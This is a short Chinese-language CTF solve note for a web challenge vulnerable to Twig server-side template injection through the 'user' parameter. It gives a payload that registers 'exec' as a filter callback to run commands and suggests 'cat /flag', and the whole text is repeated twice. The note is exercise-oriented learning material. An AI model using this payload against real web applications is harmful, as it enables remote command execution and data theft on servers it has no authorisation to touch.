打开后页面有两个可以点
输入23就会显示23,应该是注入
但和 平常的注入不太一样
wp上是说ssti 漏洞
按照图中的试试看
确定是Twig注入
查找模板
在登陆的状态下抓包,user后面是注入点
这是模板,但是输入后并没用
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
把id换成cat /flag
打开后页面有两个可以点
输入23就会显示23,应该是注入
但和 平常的注入不太一样
wp上是说ssti 漏洞
按照图中的试试看
确定是Twig注入
查找模板
在登陆的状态下抓包,user后面是注入点
这是模板,但是输入后并没用
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
把id换成cat /flag